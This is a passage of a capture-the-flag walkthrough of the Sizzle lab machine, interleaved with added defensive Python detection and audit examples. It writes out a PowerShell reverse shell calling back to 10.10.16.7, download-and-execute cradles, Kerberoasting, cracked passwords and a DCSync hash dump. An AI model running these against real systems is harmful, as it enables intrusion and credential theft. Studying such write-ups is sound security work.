3 0g 0:00:00:07 DONE (2022-04-24 00:35) 0g/s 496667p/s 496667c/s 496667C/s 0125457423 .a6_123
4 0g 0:00:00:07 DONE (2022-04-24 00:35) 0g/s 495294p/s 495294c/s 495294C/s cxz..*7¡Vamos!
1 0g 0:00:00:07 DONE (2022-04-24 00:35) 0g/s 493252p/s 493252c/s 493252C/s Jakekovac3.ie168
Waiting for 3 children to terminate
Session completed.
I obtained Ashare1972.
Requesting a certificate and logging in to the target as amanda over WinRM:
Maybe I can try logging in to the target:
$ evil-winrm -i 10.10.10.103 -u amanda -p Ashare1972
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMHTTPTransportError happened, message is Unable to parse authorization header. Headers: {"Server"=>"Microsoft-HTTPAPI/2.0", "Date"=>"Sun, 24 Apr 2022 02:02:37 GMT", "Connection"=>"close", "Content-Length"=>"0"}
Body: (401).
Error: Exiting with code 1
This is not the usual authentication failure or network timeout, so perhaps I should keep that in mind. At least my password should be correct. Maybe I can unlock new SMB shares:
$ smbmap -H 10.10.10.103 -u amanda -p Ashare1972
[+] IP: 10.10.10.103:445 Name: sizzle.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Operations NO ACCESS
SYSVOL READ ONLY Logon server share
Indeed, I can now access CertEnroll, NETLOGON and SYSVOL:
$ smbclient //10.10.10.103/CertEnroll -U amanda%Ashare1972
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 23 14:35:47 2022
.. D 0 Sat Apr 23 14:35:47 2022
HTB-SIZZLE-CA+.crl A 721 Sat Apr 23 14:35:47 2022
HTB-SIZZLE-CA.crl A 909 Sat Apr 23 14:35:47 2022
nsrev_HTB-SIZZLE-CA.asp A 322 Tue Jul 3 04:36:05 2018
sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt A 871 Tue Jul 3 04:36:03 2018
7779839 blocks of size 4096. 3573522 blocks available
It looks like a pile of certificates. I remember the login prompt on the web side asking for account credentials; maybe I can try amanda there:
It works. Seeing the download button, I thought I could check whether the web directory and the share directory are linked; if they were, I could try dropping a webshell into the share. But they do not seem to be linked:
The downloaded file names do not match anything in the share directory. Perhaps I can request a certificate instead, but clicking "request a user certificate" gives an error:
Perhaps I need to generate a certificate request myself and submit it. But what could a certificate be used for? I have a rough guess:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2022-04-23T14:58:36+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after: 2019-07-02T20:26:23
evil-winrm is built on Microsoft WinRM (Windows Remote Management), usually on port 5985. Port 5985 does not work; I already connected to it just now and it said it could not parse the authorization header. Port 5986 is the one that requires an SSL certificate. Perhaps that is where the certificate is used, so I can generate one:
$ openssl req -nodes -newkey rsa:2048 -keyout amanda.key -out amanda.csr
Generating a RSA private key
...........................................................+++++
.............+++++
writing new private key to 'amanda.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Paste the contents of the CSR file in and submit:
It generates a download page:
This time I can connect with evil-winrm using the certificate it issued me:
$ evil-winrm -c certnew.cer -k amanda.key -i 10.10.10.103 -u amanda -p Ashare1972 -S
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\amanda\Documents>
Host reconnaissance:
I did not find user.txt:
*Evil-WinRM* PS C:\Users\amanda\desktop> ls -force
Directory: C:\Users\amanda\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 12/2/2018 5:09 PM 282 desktop.ini
*Evil-WinRM* PS C:\Users\amanda\desktop>
This is the Users directory:
*Evil-WinRM* PS C:\users> ls
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/2/2018 4:29 PM .NET v4.5
d----- 7/2/2018 4:29 PM .NET v4.5 Classic
d----- 8/19/2018 3:04 PM administrator
d----- 9/30/2018 5:05 PM amanda
d----- 7/2/2018 12:39 PM mrlky
d----- 7/11/2018 5:59 PM mrlky.HTB
d-r--- 11/20/2016 8:24 PM Public
d----- 7/3/2018 10:32 PM WSEnrollmentPolicyServer
d----- 7/3/2018 10:49 PM WSEnrollmentServer
I can see there is an mrlky user. But my current user's privileges are low, and I cannot go anywhere except my own directory:
*Evil-WinRM* PS C:\users\mrlky.htb> cd ..
*Evil-WinRM* PS C:\users> cd public
*Evil-WinRM* PS C:\users\public> ls
Access to the path 'C:\users\public' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\users\public:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\users\public> cd ..
*Evil-WinRM* PS C:\users>
I can also see there is a sizzler user:
*Evil-WinRM* PS C:\users> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator amanda DefaultAccount
Guest krbtgt mrlky
sizzler
The command completed with one or more errors.
I tried to transfer winPEAS over, but I am restricted by AppLocker:
*Evil-WinRM* PS C:\Users\amanda\desktop> wget http://10.10.16.7/winPEASx86.exe -O winPEASx86.exe
*Evil-WinRM* PS C:\Users\amanda\desktop> ls
Directory: C:\Users\amanda\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/23/2022 10:21 PM 1936384 winPEASx86.exe
*Evil-WinRM* PS C:\Users\amanda\desktop> ./winPEASx86.exe
Program 'winPEASx86.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1
+ ./winPEASx86.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ ./winPEASx86.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\amanda\desktop> wget http://10.10.16.7/winPEAS.bat -O winPEAS.bat
*Evil-WinRM* PS C:\Users\amanda\desktop> ls
Directory: C:\Users\amanda\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/23/2022 10:23 PM 35766 winPEAS.bat
-a---- 4/23/2022 10:21 PM 1936384 winPEASx86.exe
*Evil-WinRM* PS C:\Users\amanda\desktop> ./winPEAS.bat
winPEAS.bat : This program is blocked by group policy. For more information, contact your system administrator.
+ CategoryInfo : NotSpecified: (This program is... administrator.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\amanda\desktop>
No special privileges, and no special groups:
*Evil-WinRM* PS C:\Users\amanda\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\amanda\desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
*Evil-WinRM* PS C:\Users\amanda\desktop>
I wanted Metasploit to help me automatically enumerate information for privilege escalation, but my PowerShell also seems to be restricted:
*Evil-WinRM* PS C:\Users\amanda\desktop> IEX ((new-object net.webclient).downloadstring('http://10.10.16.7/shell.ps1'))
Cannot create type. Only core types are supported in this language mode.
At line:1 char:7
+ IEX ((new-object net.webclient).downloadstring('http://10.10.16.7/she ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (:) [New-Object], PSNotSupportedException
+ FullyQualifiedErrorId : CannotCreateTypeConstrainedLanguage,Microsoft.PowerShell.Commands.NewObjectCommand
*Evil-WinRM* PS C:\Users\amanda\desktop>
PowerShell Constrained Language Mode is enabled, and it does not allow me to load other modules:
*Evil-WinRM* PS C:\Department Shares\users\public> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
On this I found the following article via Google; I can bypass the restriction by downgrading the version:
https://www.ired.team/offensive-security/code-execution/powershell-constrained-language-mode-bypass
The current PowerShell version is:
*Evil-WinRM* PS C:\Users\amanda> $psversiontable
Name Value
---- -----
PSVersion 5.1.14393.2636
PSEdition Desktop
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...}
BuildVersion 10.0.14393.2636
CLRVersion 4.0.30319.42000
WSManStackVersion 3.0
PSRemotingProtocolVersion 2.3
SerializationVersion 1.1.0.1
*Evil-WinRM* PS C:\Users\amanda>
I can use PowerShell version 2 to bypass this restriction, because:
*Evil-WinRM* PS C:\Department Shares\users\public> powershell -v 2 -c $ExecutionContext.SessionState.LanguageMode
FullLanguage
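The downgrade shown above is precisely why defenders treat any "powershell -v 2" on a modern host as suspicious: the 2.0 engine predates Constrained Language Mode and script block logging, so a single command-line switch removes both. The following is an added example for this write-up, not code from the original post or from the linked article: a detection pass over process-creation-style records that flags the version-2 downgrade, execution-policy bypass and download-cradle patterns. The events are constructed; the first three mirror command lines that appear in this write-up, the last two are benign.

```python
"""Flag PowerShell command lines that downgrade to engine version 2 (which has no
Constrained Language Mode) or carry other bypass indicators.

Added example for this write-up, not from the original post. The events below are
constructed; the field names imitate a generic process-creation log record.
"""
import re
from typing import Dict, List

# Constructed events: the first three mirror command lines used in this write-up,
# the last two are benign.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "SIZZLE", "user": "HTB\\amanda",
     "cmdline": "powershell -v 2 -c $ExecutionContext.SessionState.LanguageMode"},
    {"host": "SIZZLE", "user": "HTB\\amanda",
     "cmdline": "powershell -v 2 -ep bypass -command \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://10.10.16.7/shell.ps1')\""},
    {"host": "SIZZLE", "user": "HTB\\amanda",
     "cmdline": "powershell -version 2 -nop -noexit -exec bypass -c '.\\shell.ps1'"},
    {"host": "WS01", "user": "HTB\\bob",
     "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    {"host": "WS01", "user": "HTB\\bob",
     "cmdline": "notepad.exe C:\\notes.txt"},
]

# The image is powershell / powershell.exe / pwsh at the start of the command line
# or right after a path separator or quote.
POWERSHELL_EXE = re.compile(
    r"(?:^|[\\\s\"'])(?:powershell|pwsh)(?:\.exe)?(?=$|[\s\"'])", re.I)
# -v 2, -ver 2, -version 2.0: powershell.exe accepts any unambiguous prefix of -Version.
VERSION_2 = re.compile(r"(?<![\w-])-v[a-z]{0,6}\s+2(?:\.0)?(?!\S)", re.I)
# -ep bypass, -exec bypass, -ExecutionPolicy Bypass
EXEC_BYPASS = re.compile(
    r"(?<![\w-])-(?:ep|ex|exe|exec|executionpolicy)\s+bypass(?!\S)", re.I)
# IEX / Invoke-Expression combined with a download primitive on the same command line
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:iex|invoke-expression)\b.*\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b",
    re.I | re.S)


def analyze(cmdline: str) -> List[str]:
    """Return indicator tags for one command line (empty list when nothing matches)."""
    tags: List[str] = []
    if not POWERSHELL_EXE.search(cmdline):
        return tags
    if VERSION_2.search(cmdline):
        tags.append("ps_v2_downgrade")  # engine 2.0: no Constrained Language Mode
    if EXEC_BYPASS.search(cmdline):
        tags.append("execpolicy_bypass")
    if DOWNLOAD_CRADLE.search(cmdline):
        tags.append("download_cradle")
    return tags


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Keep only events that carry at least one indicator, annotated with their tags."""
    flagged: List[Dict[str, object]] = []
    for ev in events:
        tags = analyze(ev["cmdline"])
        if tags:
            flagged.append({**ev, "tags": tags})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["user"], hit["tags"], hit["cmdline"])
```

Command-line matching is the cheap first pass; the authoritative signal is the Windows PowerShell log, where event ID 400 reports EngineVersion=2.0 whenever the old engine starts. The durable fix is to remove the optional feature that provides the 2.0 engine (MicrosoftWindowsPowerShellV2Root), after which "-v 2" simply falls back to the current engine and the language-mode restriction stays in force.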
I can try loading my payload. My HTTP server did see the target fetch the payload, but no session called back; perhaps the MSF payload needs a newer PowerShell version:
*Evil-WinRM* PS C:\> powershell -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.7/shell.ps1')"
*Evil-WinRM* PS C:\>
But when I tried generating shell.exe and transferring it via the SMB share:
smb: \Users\Public\> ls
. D 0 Sun Apr 24 10:55:38 2022
.. D 0 Sun Apr 24 10:55:38 2022
7779839 blocks of size 4096. 3571474 blocks available
smb: \Users\Public\> put shell.exe
putting file hack.exe as \Users\Public\shell.exe (39.4 kb/s) (average 39.4 kb/s)
smb: \Users\Public\> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now
And when I executed the payload:
*Evil-WinRM* PS C:\Department Shares\users\public> ls
Directory: C:\Department Shares\users\public
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/23/2022 10:55 PM 73802 shell.exe
*Evil-WinRM* PS C:\Department Shares\users\public> ./shell.exe
Program 'shell.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ ./shell.exe
+ ~~~~~~~~~~~.
At line:1 char:1
+ ./shell.exe
+ ~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Department Shares\users\public>
I thought this was another colleague's prank, so I reset the environment, but it was still the same. Perhaps the target really does have antivirus protection, but I have no idea what protection it is running, since I cannot tell from the process list. I tried to use Evil-WinRM's built-in bypass for malware detection, but I failed, because my PowerShell is restricted and I cannot make it load this module under PowerShell 2:
*Evil-WinRM* PS C:\Department Shares\users\public> Bypass-4MSI
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:1 char:1
+ [RuNtIME.InTeROPSErviCEs.MaRShal]::WriTeBytE([ReF].AssEmBlY.GETType(" ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage
*Evil-WinRM* PS C:\Department Shares\users\public>
I tried encoding my PowerShell payload, but once transferred it was still killed by the antivirus:
*Evil-WinRM* PS C:\Users\amanda> Invoke-WebRequest http://10.10.16.7/shell.ps1 -outfile shell.ps1
*Evil-WinRM* PS C:\Users\amanda> powershell -version 2 -nop -nop -noexit -exec bypass -c '.\shell.ps1'
powershell.exe : .\shell.ps1 : Operation did not complete successfully because the file contains a virus or potentially unwanted softwar
I have not yet mastered PowerShell AV evasion, and if I generate an evasive exe payload, it gets blocked by AppLocker instead.
Domain reconnaissance:
At the moment I know too little about the target. I hope BloodHound can enumerate more information for me; although the target has all sorts of restrictions, I have the Python version of BloodHound that runs remotely:
$ python3 bloodhound.py -d HTB.local -u 'Amanda' -p 'Ashare1972' -c all -ns 10.10.10.103
INFO: Found AD domain: htb.local
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
WARNING: Could not resolve SID: S-1-5-21-2379389067-1826974543-3574127760-1000
INFO: Found 8 users
INFO: Connecting to GC LDAP server: sizzle.HTB.LOCAL
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: sizzle.HTB.LOCAL
INFO: User Guest is logged in on sizzle.HTB.LOCAL from 10.10.17.130
WARNING: Could not resolve hostname to SID: 10.10.17.130
INFO: Done in 00M 39S
I can choose the pre-built query Find Principals with DCSync Rights:
The user MRLKY@HTB.LOCAL has the DS-Replication-Get-Changes privilege on the domain HTB.LOCAL.
Individually, this edge does not grant the ability to perform an attack. However, in conjunction with DS-Replication-Get-Changes-All, a principal may perform a DCSync attack.
As it happens, the MRLKY user has both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, so I could launch a DCSync attack through the MRLKY user, but right now I have no credentials for MRLKY at all. Perhaps MRLKY's hash is sitting in a cache somewhere, but I did not detect port 88 at all.
I believe port 88 is open and running Kerberos, just deliberately hidden, because port 88 is in the LISTENING state:
*Evil-WinRM* PS C:\Users\amanda> netstat -aon -p tcp | findstr "88"
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 612
TCP 0.0.0.0:49688 0.0.0.0:0 LISTENING 612
*Evil-WinRM* PS C:\Users\amanda> tasklist | findstr 612
tasklist.exe : ERROR: Access denied
+ CategoryInfo : NotSpecified: (ERROR: Access denied:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\amanda>
Perhaps the author didn't want me to reach it from outside; maybe I could reach it through a forwarded proxy. My first thought was to spawn a Meterpreter session and then set up a proxy-forwarding service. I can manage AV evasion, but I don't know much about AppLocker bypass. I found the following tool:
https://github.com/GreatSCT/GreatSCT
But it installs too slowly, and the install hadn't even succeeded.
Getting a PowerShell 2 shell:
I can try to get a reverse shell based on PowerShell 2, because PowerShell 2 does not enable Constrained Language Mode. Also, in Evil-WinRM I would have to specify the PowerShell version every time, so to save myself that hassle I'll create shell.ps1 locally with the following content. I expect the AV won't block it, because it contains no shellcode:
$client = New-Object System.Net.Sockets.TCPClient("10.10.16.7",3333);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Then I download it remotely and execute it specifying PowerShell version 2:
*Evil-WinRM* PS C:\Users\amanda> Invoke-WebRequest http://10.10.16.7/shell.ps1 -outfile shell.ps1
*Evil-WinRM* PS C:\Users\amanda> powershell -version 2 -nop -nop -noexit -exec bypass -c '.\shell.ps1'
And I receive the session as hoped:
$ nc -lvnp 3333
listening on [any] 3333 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.103] 54489
whoami
htb\amanda
PS C:\Users\amanda>
Obtaining the MRLKY account's credentials:
Now I can run PowerShell commands conveniently, but I still can't run payloads, since the AV would kill them. I can, however, try loading PowerView:
PS C:\Users\amanda> IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.7/PowerView.ps1')
PS C:\Users\amanda> ls
Directory: C:\Users\amanda
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r-- 12/2/2018 5:09 PM Contacts
d-r-- 4/23/2022 10:23 PM Desktop
d-r-- 12/2/2018 5:09 PM Documents
d-r-- 12/2/2018 5:09 PM Downloads
d-r-- 12/2/2018 5:09 PM Favorites
d-r-- 12/2/2018 5:09 PM Links
d-r-- 12/2/2018 5:09 PM Music
d-r-- 12/2/2018 5:09 PM Pictures
d-r-- 12/2/2018 5:09 PM Saved Games
d-r-- 12/2/2018 5:09 PM Searches
d-r-- 12/2/2018 5:09 PM Videos
-a--- 4/24/2022 12:44 AM 0 info.txt
-a--- 4/24/2022 1:52 AM 501 shell.ps1
PS C:\Users\amanda> Get-NetDomain
Forest : HTB.LOCAL
DomainControllers : {sizzle.HTB.LOCAL}
Children : {}
DomainMode :
Parent :
PdcRoleOwner : sizzle.HTB.LOCAL
RidRoleOwner : sizzle.HTB.LOCAL
InfrastructureRoleOwner : sizzle.HTB.LOCAL
Name : HTB.LOCAL
PS C:\Users\amanda>
I can use PowerShell to attach credentials to the current user amanda, so that I can export hash credentials from inside the target through the current user:
PS C:\Users\amanda> $Password = ConvertTo-SecureString 'Ashare1972' -AsPlainText -Force
PS C:\Users\amanda> $Cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\amanda', $Password)
Then, following the instructions in this document:
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-UserImpersonation/
I use PowerView's Invoke-UserImpersonation module:
PS C:\Users\amanda> Invoke-UserImpersonation -Credential $Cred
1444
PS C:\Users\amanda> Invoke-Kerberoast
SamAccountName : mrlky
DistinguishedName : CN=mrlky,CN=Users,DC=HTB,DC=LOCAL
ServicePrincipalName : http/sizzle
TicketByteHexStream :
Hash : $krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle*$828F1EE80C7616BBB6D25FD14D3F753B$5C690D71DBFFBDB0F8A0F
PS C:\Users\amanda>
This gives me the TGS credential for the mrlky account. I paused for a moment over why it was a TGS; perhaps mrlky is a service account. I can copy it locally and brute-force it, but before cracking, the TGS credential needs some processing:
Spaces need to be removed, and the / in the middle of http/sizzle needs to be removed; the ticket shouldn't contain these things. After processing, hashcat could not crack the ticket, but john still guessed a candidate password for me, Football#7:
$ john -w=/usr/share/wordlists/rockyou.txt --fork=4 ./hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7 (?)
2 1g 0:00:00:04 DONE (2022-04-24 14:35) 0.2178g/s 608237p/s 608237c/s 608237C/s Footie123..Foh9iyd=,r^j
4 0g 0:00:00:05 DONE (2022-04-24 14:35) 0g/s 611934p/s 611934c/s 611934C/s cxz..*7¡Vamos!
1 0g 0:00:00:05 DONE (2022-04-24 14:35) 0g/s 610893p/s 610893c/s 610893C/s Jakekovac3.ie168
Waiting for 3 children to terminate
3 0g 0:00:00:05 DONE (2022-04-24 14:35) 0g/s 608817p/s 608817c/s 608817C/s 0125457423 .a6_123
Session completed.
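The cleanup step above (joining the line-wrapped Hash field into one string) is also where a defender can read off the part that matters: the number after `$krb5tgs$` is the Kerberos encryption type, and 23 means RC4-HMAC, the etype that makes Kerberoasting cheap and that shows up on the DC as event 4769 with TicketEncryptionType 0x17. The parser below is an added example, not code from the write-up; it handles the `*user$realm$spn*` layout PowerView printed above, and the ticket string in it is a constructed sample, not the page's data.

```python
import re

# Constructed sample in the layout PowerView prints (not the ticket data from the page):
# the Hash field is wrapped over several lines, so the blob contains newlines and spaces.
SAMPLE_TGS = """$krb5tgs$23$*svc_demo$EXAMPLE.LOCAL$http/demohost*$0123456789ABCDEF0123456789ABCDEF$AABB
CCDD EEFF0011
2233"""

# Kerberos encryption type numbers as they appear after "$krb5tgs$".
# 17/18 (AES) service accounts are the mitigation: no RC4 ticket is ever issued for them.
ETYPE_NAMES = {
    23: "RC4-HMAC (key = NT hash of the service account password)",
    17: "AES128-CTS-HMAC-SHA1-96",
    18: "AES256-CTS-HMAC-SHA1-96",
}

# $krb5tgs$<etype>$*<user>$<realm>$<spn>*$<16-byte checksum>$<encrypted ticket part>
TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*\$"
    r"(?P<checksum>[0-9A-Fa-f]{32})\$(?P<edata>[0-9A-Fa-f]+)$"
)


def normalize_tgs(blob: str) -> str:
    """Join a line-wrapped ticket string into one line by dropping all whitespace."""
    return "".join(blob.split())


def parse_tgs(blob: str) -> dict:
    """Split a $krb5tgs$ string into its fields; raise ValueError if it is malformed."""
    m = TGS_RE.match(normalize_tgs(blob))
    if not m:
        raise ValueError("not a well-formed $krb5tgs$ string")
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    fields["etype_name"] = ETYPE_NAMES.get(fields["etype"], "unknown etype")
    # etype 23 is the case worth flagging: RC4 tickets are the cheapest to crack offline,
    # and a 4769 event with TicketEncryptionType 0x17 for a user SPN is the classic indicator.
    fields["rc4"] = fields["etype"] == 23
    return fields


if __name__ == "__main__":
    t = parse_tgs(SAMPLE_TGS)
    print(f"{t['user']}@{t['realm']} spn={t['spn']} etype={t['etype']} ({t['etype_name']})")
```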
Getting SYSTEM on the target:
Verifying this password is simple, because BloodHound already told me that mrlky can launch a DCSync attack. I can use impacket's secretsdump.py to dump the target's NTDS.dit, and I don't need to worry at all about port 88 / Kerberos not being reachable from outside, because secretsdump.py does not go through port 88; it goes over RPC:
./secretsdump.py htb.local/mrlky:Football#7@10.10.10.103
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:53fc6612a610627883a22dcddce94afd:::
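A dump in this `domain\uid:rid:lmhash:nthash` layout is also what a defender gets from an authorised credential audit, and the first thing to do with it is hygiene checks: accounts whose NT hash is the empty-password hash, accounts that still store an LM hash, and user accounts sharing one NT hash (password reuse). The audit below is an added example, not code from the write-up or from impacket; the dump it runs over is constructed (the `e52cac67...`/`8846f7ea...` pair is the well-known LM/NT hash of the word "password"), not the page's data.

```python
import re
from collections import defaultdict

# Well-known constants: the LM field secretsdump prints when LM storage is disabled,
# and the NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One credential row of the listing: name:rid:lmhash:nthash:::
ROW_RE = re.compile(r"^(?P<name>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

# Constructed sample dump (not the page's data); a status line is included to show it is skipped.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0fcb3a0d9a1c7d5a9f1b2c3d4e5f6a7b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_web:1200:aad3b435b51404eeaad3b435b51404ee:0fcb3a0d9a1c7d5a9f1b2c3d4e5f6a7b:::
legacy:1300:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
HOST01$:1001:aad3b435b51404eeaad3b435b51404ee:5e8d3a1c9f7b2e4d6a0c8b1f3e5d7a9c:::
"""


def parse_dump(text: str) -> list:
    """Return the credential rows of a secretsdump listing, ignoring [*]/[-] status lines."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append({**m.groupdict(), "rid": int(m["rid"])})
    return rows


def audit_dump(text: str) -> dict:
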